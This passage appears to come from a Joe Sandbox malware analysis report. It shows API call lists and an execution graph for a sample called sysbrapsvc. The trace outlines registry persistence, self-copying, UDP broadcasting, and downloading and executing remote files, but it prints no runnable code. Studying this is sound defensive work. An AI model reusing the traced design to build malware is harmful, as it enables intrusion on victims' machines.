                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                • String ID: TCP$UDP
                                                                                • API String ID: 1519345861-1097902612
                                                                                • Opcode ID: f2a508b97fbae45076dd5aa5ad3ba9adeb76e4e7dff97a5c25cb73082fa5fcae
                                                                                • Instruction ID: 6b43ad666573891978052671c2ef92d80966ae61c726f1f98895f42c7cfd0708
                                                                                • Opcode Fuzzy Hash: f2a508b97fbae45076dd5aa5ad3ba9adeb76e4e7dff97a5c25cb73082fa5fcae
                                                                                • Instruction Fuzzy Hash: 13117CB5D00208ABDB00EFE5DC46BAEB375EB44308F10856AE405772C6D7786A64CF9A
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0041A400,?,00000000,?), ref: 00405E5F
                                                                                • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405E9E
                                                                                • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F13
                                                                                • LeaveCriticalSection.KERNEL32(0041A400), ref: 00405F30
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSectionmemcpy$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 469056452-0
                                                                                • Opcode ID: ca7ff8a173ea6a847f8488c1e8f62911d32ba33057f6ba12d9e30303517d8d68
                                                                                • Instruction ID: 7768dcd7b9dbcee261a05c0b48706a70a5e16e7133226d349280dc208485dc19
                                                                                • Opcode Fuzzy Hash: ca7ff8a173ea6a847f8488c1e8f62911d32ba33057f6ba12d9e30303517d8d68
                                                                                • Instruction Fuzzy Hash: 73216B70D04208ABDB04DF94D889BDEB771EB44304F14C1BAE84567281C3BDAA95CF9A

                                                                                Execution Graph

                                                                                Execution Coverage:0.1%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:1470
                                                                                Total number of Limit Nodes:1
                                                                                execution_graph 4374 407500 Sleep CreateMutexA GetLastError 4375 407536 ExitProcess 4374->4375 4376 40753e 6 API calls 4374->4376 4377 4075e3 4376->4377 4378 4078a9 Sleep RegOpenKeyExW 4376->4378 4454 40ebe0 GetLocaleInfoA strcmp 4377->4454 4379 407902 RegOpenKeyExW 4378->4379 4380 4078d6 RegSetValueExA RegCloseKey 4378->4380 4382 407924 RegSetValueExA RegCloseKey 4379->4382 4383 407955 RegOpenKeyExW 4379->4383 4380->4379 4385 4079fa RegOpenKeyExW 4382->4385 4386 407977 RegCreateKeyExW RegCloseKey 4383->4386 4387 4079ac RegOpenKeyExW 4383->4387 4391 407a1c RegSetValueExA RegCloseKey 4385->4391 4392 407a4d RegOpenKeyExW 4385->4392 4386->4387 4387->4385 4390 4079ce RegSetValueExA RegCloseKey 4387->4390 4388 4075f0 ExitProcess 4389 4075f8 ExpandEnvironmentStringsW wsprintfW CopyFileW 4393 40764c SetFileAttributesW RegOpenKeyExW 4389->4393 4394 4076de Sleep wsprintfW CopyFileW 4389->4394 4390->4385 4397 407b49 RegOpenKeyExW 4391->4397 4398 407aa4 RegOpenKeyExW 4392->4398 4399 407a6f RegCreateKeyExW RegCloseKey 4392->4399 4393->4394 4400 40767d wcslen RegSetValueExW 4393->4400 4395 407726 SetFileAttributesW RegOpenKeyExW 4394->4395 4396 4077b8 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4394->4396 4395->4396 4403 407757 wcslen RegSetValueExW 4395->4403 4396->4378 4404 407817 SetFileAttributesW RegOpenKeyExW 4396->4404 4401 407b97 RegOpenKeyExW 4397->4401 4402 407b6b RegSetValueExA RegCloseKey 4397->4402 4405 407ac6 RegCreateKeyExW RegCloseKey 4398->4405 4406 407afb RegOpenKeyExW 4398->4406 4399->4398 4400->4394 4407 4076b2 RegCloseKey 4400->4407 4408 407be5 RegOpenKeyExA 4401->4408 4409 407bb9 RegSetValueExA RegCloseKey 4401->4409 4402->4401 4403->4396 4410 40778c RegCloseKey 4403->4410 4404->4378 4411 407848 wcslen RegSetValueExW 4404->4411 4405->4406 4406->4397 4412 407b1d RegSetValueExA RegCloseKey 4406->4412 4456 40ee30 memset memset CreateProcessW 4407->4456 4414 407cf1 RegOpenKeyExA 4408->4414 4415 407c0b 8 API calls 4408->4415 4409->4408 4416 40ee30 6 API calls 4410->4416 4411->4378 4417 40787d RegCloseKey 4411->4417 4412->4397 4420 407d17 8 API calls 4414->4420 4421 407dfd Sleep 4414->4421 4415->4414 4422 4077a5 4416->4422 4423 40ee30 6 API calls 4417->4423 4419 4076d6 ExitProcess 4420->4421 4461 40cc80 4421->4461 4422->4396 4424 4077b0 ExitProcess 4422->4424 4426 407896 4423->4426 4426->4378 4428 4078a1 ExitProcess 4426->4428 4429 407e18 9 API calls 4464 405b60 InitializeCriticalSection CreateFileW 4429->4464 5289 405820 4429->5289 5298 406b50 Sleep GetModuleFileNameW 4429->5298 5312 4073b0 4429->5312 4431 407f84 4436 407ecd CreateEventA 4496 40c3b0 4436->4496 4445 40d610 17 API calls 4446 407f2d 4445->4446 4447 40d610 17 API calls 4446->4447 4448 407f49 4447->4448 4449 40d610 17 API calls 4448->4449 4450 407f65 4449->4450 4541 40d780 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4450->4541 4452 407f75 4550 40d8c0 4452->4550 4455 4075e8 4454->4455 4455->4388 4455->4389 4457 40eea1 ShellExecuteW 4456->4457 4458 40ee92 Sleep 4456->4458 4459 4076cb 4457->4459 4460 40eec7 Sleep 4457->4460 4458->4459 4459->4394 4459->4419 4460->4459 4559 40cc50 4461->4559 4465 405c85 4464->4465 4466 405b98 CreateFileMappingW 4464->4466 4478 40daf0 CoInitializeEx 4465->4478 4467 405bb9 MapViewOfFile 4466->4467 4468 405c7b CloseHandle 4466->4468 4469 405c71 CloseHandle 4467->4469 4470 405bd8 GetFileSize 4467->4470 4468->4465 4469->4468 4472 405bed 4470->4472 4471 405c67 UnmapViewOfFile 4471->4469 4472->4471 4474 405c2c 4472->4474 4477 405bfc 4472->4477 4688 40ccd0 4472->4688 4695 405c90 4472->4695 4475 40a660 _invalid_parameter 3 API calls 4474->4475 4475->4477 4477->4471 5003 40dbc0 socket 4478->5003 4480 407ec8 4491 406f70 CoInitializeEx SysAllocString 4480->4491 4481 40db98 5047 40a780 4481->5047 4484 40db5a 5028 40af30 htons 4484->5028 4485 40db10 4485->4480 4485->4481 4485->4484 5013 40de30 4485->5013 4490 40e920 24 API calls 4490->4481 4492 406f92 4491->4492 4493 406fa8 CoUninitialize 4491->4493 5192 406fc0 4492->5192 4493->4436 5201 40c370 4496->5201 4499 40c370 3 API calls 4500 40c3ce 4499->4500 4501 40c370 3 API calls 4500->4501 4502 40c3de 4501->4502 4503 40c370 3 API calls 4502->4503 4504 407ee5 4503->4504 4505 40d5e0 4504->4505 4506 40a240 7 API calls 4505->4506 4507 40d5eb 4506->4507 4508 407eef 4507->4508 4509 40d5f7 InitializeCriticalSection 4507->4509 4510 40b770 InitializeCriticalSection 4508->4510 4509->4508 4512 40b78a 4510->4512 4511 40b7b9 CreateFileW 4513 40b7e0 CreateFileMappingW 4511->4513 4514 40b8a2 4511->4514 4512->4511 5208 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 4512->5208 5209 40b350 4512->5209 4517 40b801 MapViewOfFile 4513->4517 4518 40b898 CloseHandle 4513->4518 5257 40b010 EnterCriticalSection 4514->5257 4520 40b81c GetFileSize 4517->4520 4521 40b88e CloseHandle 4517->4521 4518->4514 4519 40b8a7 4523 40d610 17 API calls 4519->4523 4527 40b83b 4520->4527 4521->4518 4524 407ef9 4523->4524 4529 40d610 4524->4529 4525 40b884 UnmapViewOfFile 4525->4521 4527->4525 4528 40b350 32 API calls 4527->4528 5256 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 4527->5256 4528->4527 4530 40d627 EnterCriticalSection 4529->4530 4531 407f12 4529->4531 5284 40d700 4530->5284 4531->4445 4534 40d6eb LeaveCriticalSection 4534->4531 4535 40a490 9 API calls 4536 40d669 4535->4536 4536->4534 4537 40d67b CreateThread 4536->4537 4537->4534 4538 40d69e 4537->4538 4539 40d6c2 GetCurrentProcess GetCurrentProcess DuplicateHandle 4538->4539 4540 40d6e4 4538->4540 4539->4540 4540->4534 4542 40d7b6 InterlockedExchangeAdd 4541->4542 4543 40d899 GetCurrentThread SetThreadPriority 4541->4543 4542->4543 4547 40d7d0 4542->4547 4543->4452 4544 40d7e9 EnterCriticalSection 4544->4547 4545 40d857 LeaveCriticalSection 4545->4547 4549 40d86e 4545->4549 4546 40d833 WaitForSingleObject 4546->4547 4547->4543 4547->4544 4547->4545 4547->4546 4548 40d88c Sleep 4547->4548 4547->4549 4548->4547 4549->4543 4551 40d8cc EnterCriticalSection 4550->4551 4558 40d942 4550->4558 4552 40d8e8 4551->4552 4553 40d910 LeaveCriticalSection DeleteCriticalSection 4552->4553 4554 40d8fb CloseHandle 4552->4554 4555 40a660 _invalid_parameter 3 API calls 4553->4555 4554->4552 4556 40d936 4555->4556 4557 40a660 _invalid_parameter 3 API calls 4556->4557 4557->4558 4558->4431 4562 40c8a0 4559->4562 4563 40c8be 4562->4563 4565 40c8d3 4562->4565 4568 40c900 4563->4568 4566 407e0d 4565->4566 4594 40ca80 4565->4594 4566->4429 4566->4431 4569 40c9b2 4568->4569 4570 40c929 4568->4570 4572 40a240 7 API calls 4569->4572 4589 40c9aa 4569->4589 4570->4589 4628 40a240 4570->4628 4574 40c9d8 4572->4574 4576 402420 7 API calls 4574->4576 4574->4589 4578 40ca05 4576->4578 4580 4024e0 10 API calls 4578->4580 4582 40ca1f 4580->4582 4581 40c97f 4583 402420 7 API calls 4581->4583 4585 402420 7 API calls 4582->4585 4584 40c990 4583->4584 4586 4024e0 10 API calls 4584->4586 4587 40ca30 4585->4587 4586->4589 4588 4024e0 10 API calls 4587->4588 4590 40ca4a 4588->4590 4589->4566 4591 402420 7 API calls 4590->4591 4592 40ca5b 4591->4592 4593 4024e0 10 API calls 4592->4593 4593->4589 4595 40caa9 4594->4595 4596 40cb5a 4594->4596 4597 40a240 7 API calls 4595->4597 4622 40cb52 4595->4622 4599 40a240 7 API calls 4596->4599 4596->4622 4598 40cabf 4597->4598 4601 402420 7 API calls 4598->4601 4598->4622 4600 40cb7e 4599->4600 4603 402420 7 API calls 4600->4603 4600->4622 4602 40cae3 4601->4602 4604 40a240 7 API calls 4602->4604 4605 40cba2 4603->4605 4606 40caf2 4604->4606 4607 40a240 7 API calls 4605->4607 4608 4024e0 10 API calls 4606->4608 4609 40cbb1 4607->4609 4610 40cb1b 4608->4610 4611 4024e0 10 API calls 4609->4611 4613 40a660 _invalid_parameter 3 API calls 4610->4613 4612 40cbda 4611->4612 4614 40a660 _invalid_parameter 3 API calls 4612->4614 4615 40cb27 4613->4615 4617 40cbe6 4614->4617 4616 402420 7 API calls 4615->4616 4618 40cb38 4616->4618 4619 402420 7 API calls 4617->4619 4620 4024e0 10 API calls 4618->4620 4621 40cbf7 4619->4621 4620->4622 4623 4024e0 10 API calls 4621->4623 4622->4566 4624 40cc11 4623->4624 4625 402420 7 API calls 4624->4625 4626 40cc22 4625->4626 4627 4024e0 10 API calls 4626->4627 4627->4622 4639 40a260 4628->4639 4631 402420 4660 40a450 4631->4660 4636 4024e0 4667 402540 4636->4667 4638 4024ff __aligned_recalloc_base 4638->4581 4648 40a300 GetCurrentProcessId 4639->4648 4641 40a26b 4642 40a277 _invalid_parameter 4641->4642 4649 40a320 4641->4649 4644 40a24e 4642->4644 4645 40a292 HeapAlloc 4642->4645 4644->4589 4644->4631 4645->4644 4646 40a2b9 _invalid_parameter 4645->4646 4646->4644 4647 40a2d4 memset 4646->4647 4647->4644 4648->4641 4657 40a300 GetCurrentProcessId 4649->4657 4651 40a329 4652 40a346 HeapCreate 4651->4652 4658 40a390 GetProcessHeaps 4651->4658 4654 40a360 HeapSetInformation GetCurrentProcessId 4652->4654 4655 40a387 4652->4655 4654->4655 4655->4642 4657->4651 4659 40a33c 4658->4659 4659->4652 4659->4655 4661 40a260 _invalid_parameter 7 API calls 4660->4661 4662 40242b 4661->4662 4663 402820 4662->4663 4664 40282a 4663->4664 4665 40a450 _invalid_parameter 7 API calls 4664->4665 4666 402438 4665->4666 4666->4636 4668 40258e 4667->4668 4670 402551 4667->4670 4669 40a450 _invalid_parameter 7 API calls 4668->4669 4668->4670 4673 4025b2 _invalid_parameter 4669->4673 4670->4638 4671 4025e2 memcpy 4672 402606 _invalid_parameter 4671->4672 4674 40a660 _invalid_parameter 3 API calls 4672->4674 4673->4671 4677 40a660 4673->4677 4674->4670 4684 40a300 GetCurrentProcessId 4677->4684 4679 40a66b 4680 4025df 4679->4680 4685 40a5a0 4679->4685 4680->4671 4683 40a687 HeapFree 4683->4680 4684->4679 4686 40a5d0 HeapValidate 4685->4686 4687 40a5f0 4685->4687 4686->4687 4687->4680 4687->4683 4705 40a6d0 4688->4705 4691 40cd11 4691->4472 4694 40a660 _invalid_parameter 3 API calls 4694->4691 4918 40a490 4695->4918 4698 405cca memcpy 4699 40a6d0 8 API calls 4698->4699 4700 405d01 4699->4700 4928 40c640 4700->4928 4703 405d88 4703->4472 4706 40a6fd 4705->4706 4707 40a450 _invalid_parameter 7 API calls 4706->4707 4708 40a712 4706->4708 4709 40a714 memcpy 4706->4709 4707->4706 4708->4691 4710 40c1e0 4708->4710 4709->4706 4712 40c1ea 4710->4712 4714 40c221 memcmp 4712->4714 4715 40c248 4712->4715 4716 40a660 _invalid_parameter 3 API calls 4712->4716 4718 40c209 4712->4718 4719 40c6d0 4712->4719 4733 407fa0 4712->4733 4714->4712 4717 40a660 _invalid_parameter 3 API calls 4715->4717 4716->4712 4717->4718 4718->4691 4718->4694 4720 40c6df _invalid_parameter 4719->4720 4721 40a450 _invalid_parameter 7 API calls 4720->4721 4723 40c6e9 4720->4723 4722 40c778 4721->4722 4722->4723 4724 402420 7 API calls 4722->4724 4723->4712 4725 40c78d 4724->4725 4726 402420 7 API calls 4725->4726 4727 40c795 4726->4727 4729 40c7ed _invalid_parameter 4727->4729 4736 40c840 4727->4736 4741 402470 4729->4741 4732 402470 3 API calls 4732->4723 4849 40a1c0 4733->4849 4737 4024e0 10 API calls 4736->4737 4738 40c854 4737->4738 4747 4026f0 4738->4747 4740 40c86c 4740->4727 4742 402484 _invalid_parameter 4741->4742 4744 4024ce 4741->4744 4745 40a660 _invalid_parameter 3 API calls 4742->4745 4746 4024ac 4742->4746 4743 40a660 _invalid_parameter 3 API calls 4743->4744 4744->4732 4745->4746 4746->4743 4750 402710 4747->4750 4749 40270a 4749->4740 4751 402724 4750->4751 4752 402540 __aligned_recalloc_base 10 API calls 4751->4752 4753 40276d 4752->4753 4754 402540 __aligned_recalloc_base 10 API calls 4753->4754 4755 40277d 4754->4755 4756 402540 __aligned_recalloc_base 10 API calls 4755->4756 4757 40278d 4756->4757 4758 402540 __aligned_recalloc_base 10 API calls 4757->4758 4759 40279d 4758->4759 4760 4027a6 4759->4760 4761 4027cf 4759->4761 4765 403e20 4760->4765 4782 403df0 4761->4782 4764 4027c7 __aligned_recalloc_base 4764->4749 4766 402820 _invalid_parameter 7 API calls 4765->4766 4767 403e37 4766->4767 4768 402820 _invalid_parameter 7 API calls 4767->4768 4769 403e46 4768->4769 4770 402820 _invalid_parameter 7 API calls 4769->4770 4771 403e55 4770->4771 4772 402820 _invalid_parameter 7 API calls 4771->4772 4781 403e64 _invalid_parameter __aligned_recalloc_base 4772->4781 4774 40400f _invalid_parameter 4775 402850 _invalid_parameter 3 API calls 4774->4775 4776 404035 _invalid_parameter 4774->4776 4775->4774 4777 402850 _invalid_parameter 3 API calls 4776->4777 4778 40405b _invalid_parameter 4776->4778 4777->4776 4779 402850 _invalid_parameter 3 API calls 4778->4779 4780 404081 4778->4780 4779->4778 4780->4764 4781->4774 4785 402850 4781->4785 4789 404090 4782->4789 4784 403e0c 4784->4764 4786 402866 4785->4786 4787 40285b 4785->4787 4786->4781 4788 40a660 _invalid_parameter 3 API calls 4787->4788 4788->4786 4790 4040a6 _invalid_parameter 4789->4790 4791 4040b8 _invalid_parameter 4790->4791 4792 4040dd 4790->4792 4794 404103 4790->4794 4791->4784 4819 403ca0 4792->4819 4795 40413d 4794->4795 4796 40415e 4794->4796 4829 404680 4795->4829 4798 402820 _invalid_parameter 7 API calls 4796->4798 4799 40416f 4798->4799 4800 402820 _invalid_parameter 7 API calls 4799->4800 4801 40417e 4800->4801 4802 402820 _invalid_parameter 7 API calls 4801->4802 4803 40418d 4802->4803 4804 402820 _invalid_parameter 7 API calls 4803->4804 4805 40419c 4804->4805 4842 403d70 4805->4842 4807 4041ca _invalid_parameter 4808 402820 _invalid_parameter 7 API calls 4807->4808 4810 404284 _invalid_parameter __aligned_recalloc_base 4807->4810 4808->4807 4809 402850 _invalid_parameter 3 API calls 4809->4810 4810->4809 4811 4045a3 _invalid_parameter 4810->4811 4812 402850 _invalid_parameter 3 API calls 4811->4812 4813 4045c9 _invalid_parameter 4811->4813 4812->4811 4814 402850 _invalid_parameter 3 API calls 4813->4814 4815 4045ef _invalid_parameter 4813->4815 4814->4813 4816 402850 _invalid_parameter 3 API calls 4815->4816 4817 404615 _invalid_parameter 4815->4817 4816->4815 4817->4791 4818 402850 _invalid_parameter 3 API calls 4817->4818 4818->4817 4820 403cae 4819->4820 4821 402820 _invalid_parameter 7 API calls 4820->4821 4822 403ccb 4821->4822 4823 402820 _invalid_parameter 7 API calls 4822->4823 4824 403cda _invalid_parameter 4823->4824 4825 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4824->4825 4826 403d3a _invalid_parameter 4824->4826 4825->4824 4827 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4826->4827 4828 403d60 4826->4828 4827->4826 4828->4791 4830 402820 _invalid_parameter 7 API calls 4829->4830 4831 404697 4830->4831 4832 402820 _invalid_parameter 7 API calls 4831->4832 4833 4046a6 4832->4833 4834 402820 _invalid_parameter 7 API calls 4833->4834 4836 4046b5 _invalid_parameter __aligned_recalloc_base 4834->4836 4835 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4835->4836 4836->4835 4837 404841 _invalid_parameter 4836->4837 4838 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4837->4838 4840 404867 _invalid_parameter 4837->4840 4838->4837 4839 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4839->4840 4840->4839 4841 40488d 4840->4841 4841->4791 4843 402820 _invalid_parameter 7 API calls 4842->4843 4844 403d7f _invalid_parameter 4843->4844 4845 403ca0 _invalid_parameter 9 API calls 4844->4845 4847 403db8 _invalid_parameter 4845->4847 4846 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4846->4847 4847->4846 4848 403de3 4847->4848 4848->4807 4850 40a1d2 4849->4850 4853 40a120 4850->4853 4854 40a450 _invalid_parameter 7 API calls 4853->4854 4861 40a130 4854->4861 4857 40a660 _invalid_parameter 3 API calls 4859 407fbf 4857->4859 4858 40a16c 4858->4857 4859->4712 4861->4858 4861->4859 4862 409650 4861->4862 4869 409c40 4861->4869 4874 40a010 4861->4874 4863 409663 4862->4863 4868 409659 4862->4868 4864 4096a6 memset 4863->4864 4863->4868 4865 4096c7 4864->4865 4864->4868 4866 4096cd memcpy 4865->4866 4865->4868 4882 409420 4866->4882 4868->4861 4870 409c4d 4869->4870 4871 409c57 4869->4871 4870->4861 4871->4870 4872 409d4f memcpy 4871->4872 4887 409970 4871->4887 4872->4871 4876 40a026 4874->4876 4880 40a01c 4874->4880 4875 409970 64 API calls 4877 40a0a7 4875->4877 4876->4875 4876->4880 4878 409420 6 API calls 4877->4878 4877->4880 4879 40a0c6 4878->4879 4879->4880 4881 40a0db memcpy 4879->4881 4880->4861 4881->4880 4883 40946e 4882->4883 4885 40942e 4882->4885 4883->4868 4885->4883 4886 409360 6 API calls 4885->4886 4886->4885 4888 409980 4887->4888 4889 40998a 4887->4889 4888->4871 4889->4888 4897 4097b0 4889->4897 4892 409ac8 memcpy 4892->4888 4894 409ae7 memcpy 4895 409c11 4894->4895 4896 409970 62 API calls 4895->4896 4896->4888 4898 4097bd 4897->4898 4900 4097c7 4897->4900 4898->4888 4898->4892 4898->4894 4899 409850 4908 409110 4899->4908 4900->4898 4900->4899 4902 409855 4900->4902 4903 409838 4900->4903 4904 409420 6 API calls 4902->4904 4906 409420 6 API calls 4903->4906 4904->4899 4906->4899 4907 4098fc memset 4907->4898 4909 409129 4908->4909 4917 40911f 4908->4917 4910 408fe0 9 API calls 4909->4910 4909->4917 4911 409222 4910->4911 4912 40a450 _invalid_parameter 7 API calls 4911->4912 4913 409271 4912->4913 4914 408e50 46 API calls 4913->4914 4913->4917 4915 40929e 4914->4915 4916 40a660 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4915->4916 4916->4917 4917->4898 4917->4907 4937 40a300 GetCurrentProcessId 4918->4937 4920 40a49b 4921 40a320 _invalid_parameter 5 API calls 4920->4921 4922 40a4a7 _invalid_parameter 4920->4922 4921->4922 4923 40a550 HeapAlloc 4922->4923 4924 40a51a HeapReAlloc 4922->4924 4925 40a5a0 _invalid_parameter HeapValidate 4922->4925 4926 40a660 _invalid_parameter 3 API calls 4922->4926 4927 405cb5 4922->4927 4923->4922 4924->4922 4925->4922 4926->4922 4927->4698 4927->4703 4931 40c64b 4928->4931 4929 40a450 _invalid_parameter 7 API calls 4929->4931 4930 405d4d 4930->4703 4932 4072a0 4930->4932 4931->4929 4931->4930 4933 40a450 _invalid_parameter 7 API calls 4932->4933 4934 4072b0 4933->4934 4935 4072f7 4934->4935 4936 4072bc memcpy CreateThread CloseHandle 4934->4936 4935->4703 4936->4935 4938 407300 4936->4938 4937->4920 4939 407371 4938->4939 4940 407311 4938->4940 4941 40737c DeleteUrlCacheEntry 4939->4941 4944 40736f 4939->4944 4943 407320 StrChrA 4940->4943 4940->4944 4947 407344 DeleteUrlCacheEntry 4940->4947 4945 40ef90 64 API calls 4941->4945 4942 40a660 _invalid_parameter 3 API calls 4946 4073a6 4942->4946 4943->4940 4943->4947 4944->4942 4945->4944 4950 40ef90 9 API calls 4947->4950 4951 40f053 InternetOpenUrlW 4950->4951 4952 40f1be InternetCloseHandle Sleep 4950->4952 4953 40f1b1 InternetCloseHandle 4951->4953 4954 40f082 CreateFileW 4951->4954 4955 40f1e5 7 API calls 4952->4955 4956 407359 Sleep 4952->4956 4953->4952 4957 40f0b1 InternetReadFile 4954->4957 4958 40f1a4 CloseHandle 4954->4958 4955->4956 4959 40f274 wsprintfW DeleteFileW Sleep 4955->4959 4956->4940 4960 40f104 CloseHandle wsprintfW DeleteFileW Sleep 4957->4960 4961 40f0d5 4957->4961 4958->4953 4962 40ec70 21 API calls 4959->4962 4978 40ec70 CreateFileW 4960->4978 4961->4960 4963 40f0de WriteFile 4961->4963 4965 40f2b4 4962->4965 4963->4957 4967 40f2f2 DeleteFileW 4965->4967 4968 40f2be Sleep 4965->4968 4967->4956 4971 40ee30 6 API calls 4968->4971 4969 40f197 DeleteFileW 4969->4958 4970 40f15b Sleep 4972 40ee30 6 API calls 4970->4972 4973 40f2d5 4971->4973 4974 40f172 4972->4974 4973->4956 4976 40f2e8 ExitProcess 4973->4976 4975 40f18e 4974->4975 4977 40f186 ExitProcess 4974->4977 4975->4958 4979 40ecb5 CreateFileMappingW 4978->4979 4980 40edca 4978->4980 4981 40edc0 CloseHandle 4979->4981 4982 40ecd6 MapViewOfFile 4979->4982 4983 40edd0 CreateFileW 4980->4983 4992 40ee21 4980->4992 4981->4980 4984 40ecf5 GetFileSize 4982->4984 4985 40edb6 CloseHandle 4982->4985 4986 40edf2 WriteFile CloseHandle 4983->4986 4987 40ee18 4983->4987 4988 40ed11 4984->4988 4989 40edac UnmapViewOfFile 4984->4989 4985->4981 4986->4987 4990 40a660 _invalid_parameter 3 API calls 4987->4990 5000 40cca0 4988->5000 4989->4985 4990->4992 4992->4969 4992->4970 4994 40c640 7 API calls 4995 40ed60 4994->4995 4995->4989 4996 40ed7d memcmp 4995->4996 4996->4989 4997 40ed99 4996->4997 4998 40a660 _invalid_parameter 3 API calls 4997->4998 4999 40eda2 4998->4999 4999->4989 5001 40c6d0 10 API calls 5000->5001 5002 40ccc4 5001->5002 5002->4989 5002->4994 5004 40dbed htons inet_addr setsockopt 5003->5004 5009 40dd1e 5003->5009 5005 40af30 8 API calls 5004->5005 5006 40dc66 bind lstrlenA sendto ioctlsocket 5005->5006 5012 40dcbb 5006->5012 5009->4485 5010 40dce2 5060 40aff0 shutdown closesocket 5010->5060 5011 40a490 9 API calls 5011->5012 5012->5010 5012->5011 5051 40dd40 5012->5051 5067 40e070 memset InternetCrackUrlA InternetOpenA 5013->5067 5016 40df4e 5016->4485 5018 40a660 _invalid_parameter 3 API calls 5018->5016 5022 40df1b 5022->5018 5025 40df11 SysFreeString 5025->5022 5174 40aef0 inet_addr 5028->5174 5031 40afdd 5036 40e920 5031->5036 5032 40af8c connect 5033 40afa0 getsockname 5032->5033 5034 40afd4 5032->5034 5033->5034 5177 40aff0 shutdown closesocket 5034->5177 5178 40aed0 inet_ntoa 5036->5178 5038 40e936 5039 40cea0 11 API calls 5038->5039 5040 40e955 5039->5040 5046 40db7c 5040->5046 5179 40e9a0 memset InternetCrackUrlA InternetOpenA 5040->5179 5043 40e98c 5045 40a660 _invalid_parameter 3 API calls 5043->5045 5044 40a660 _invalid_parameter 3 API calls 5044->5043 5045->5046 5046->4490 5050 40a784 5047->5050 5048 40a78a 5048->4480 5049 40a660 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5049->5050 5050->5048 5050->5049 5059 40dd5c 5051->5059 5052 40de24 5052->5012 5053 40dd78 recvfrom 5054 40dda6 StrCmpNIA 5053->5054 5055 40dd99 Sleep 5053->5055 5056 40ddc5 StrStrIA 5054->5056 5054->5059 5055->5059 5057 40dde6 StrChrA 5056->5057 5056->5059 5061 40cd50 5057->5061 5059->5052 5059->5053 5060->5009 5062 40cd5b 5061->5062 5063 40cd61 lstrlenA 5062->5063 5064 40a450 _invalid_parameter 7 API calls 5062->5064 5065 40cd74 5062->5065 5066 40cd90 memcpy 5062->5066 5063->5062 5063->5065 5064->5062 5065->5059 5066->5062 5066->5065 5068 40e111 InternetConnectA 5067->5068 5069 40de4a 5067->5069 5070 40e27a InternetCloseHandle 5068->5070 5071 40e14a HttpOpenRequestA 5068->5071 5069->5016 5080 40df60 5069->5080 5070->5069 5072 40e180 HttpSendRequestA 5071->5072 5073 40e26d InternetCloseHandle 5071->5073 5074 40e260 InternetCloseHandle 5072->5074 5076 40e19d 5072->5076 5073->5070 5074->5073 5075 40e1be InternetReadFile 5075->5076 5077 40e1eb 5075->5077 5076->5075 5076->5077 5078 40a490 9 API calls 5076->5078 5077->5074 5079 40e206 memcpy 5078->5079 5079->5076 5109 405630 5080->5109 5083 40de63 5083->5022 5090 40e8d0 5083->5090 5084 40df8a SysAllocString 5085 40dfa1 CoCreateInstance 5084->5085 5086 40e057 5084->5086 5088 40e04d SysFreeString 5085->5088 5089 40dfc6 5085->5089 5087 40a660 _invalid_parameter 3 API calls 5086->5087 5087->5083 5088->5086 5089->5088 5126 40e420 5090->5126 5093 40e2a0 5131 40e6f0 5093->5131 5098 40e850 6 API calls 5099 40e2f7 5098->5099 5105 40dee2 5099->5105 5148 40e510 5099->5148 5102 40e32f 5102->5105 5153 40e3c0 5102->5153 5103 40e510 6 API calls 5103->5102 5105->5025 5106 40cea0 5105->5106 5169 40ce10 5106->5169 5113 40563d 5109->5113 5110 405643 lstrlenA 5110->5113 5115 405656 5110->5115 5112 40a450 _invalid_parameter 7 API calls 5112->5113 5113->5110 5113->5112 5113->5115 5116 40a660 _invalid_parameter 3 API calls 5113->5116 5117 4055d0 5113->5117 5121 405580 5113->5121 5115->5083 5115->5084 5116->5113 5118 4055e7 MultiByteToWideChar 5117->5118 5119 4055da lstrlenA 5117->5119 5120 40560c 5118->5120 5119->5118 5120->5113 5122 40558b 5121->5122 5123 405591 lstrlenA 5122->5123 5124 4055d0 2 API calls 5122->5124 5125 4055c7 5122->5125 5123->5122 5124->5122 5125->5113 5129 40e446 5126->5129 5127 40decd 5127->5022 5127->5093 5128 40e4c3 lstrcmpiW 5128->5129 5130 40e4db SysFreeString 5128->5130 5129->5127 5129->5128 5129->5130 5130->5129 5132 40e716 5131->5132 5133 40e2bb 5132->5133 5134 40e7a3 lstrcmpiW 5132->5134 5133->5105 5143 40e850 